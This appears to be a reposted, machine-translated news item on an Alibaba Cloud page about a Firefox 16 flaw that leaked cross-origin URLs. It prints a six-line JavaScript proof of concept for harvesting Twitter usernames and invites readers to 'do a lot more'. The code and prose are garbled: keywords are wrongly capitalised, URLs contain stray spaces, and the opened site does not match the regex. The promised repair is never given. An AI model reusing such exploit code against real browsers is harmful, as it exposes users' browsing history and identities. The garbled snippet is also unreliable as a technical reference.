Firefox 16 privacy vulnerability attack method and repair

Source: Internet
Author: User

Firefox released the latest official version of Firefox 16 a few days ago, but a major security vulnerability broke out just one day after it was released. Mozilla then removed the download link of Firefox 16 from the official homepage, in turn, we will continue to provide Firefox 15.0.1.
 
Mozilla explained: "This vulnerability may allow malicious websites to obtain user access records and steal URL or URL parameters. However, there is no indication that the vulnerability has been exploited ."
 
The following is the attack code that uses this vulnerability to obtain user information. It is very simple and requires only six lines:

Function poc (){
Var win = window. open ('https: // www.2cto.com/lists/', 'newwin', 'width = 200, height = 100 ');
SetTimeout (function (){
Alert ('hello' +/^ https: \ // twitter.com \/([^/] +)/. exec (win. location) [1])
},5000 );
}
 
This Code demonstrates using the Firefox 16 vulnerability to collect Twitter user names. Of course, you can do a lot more !!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.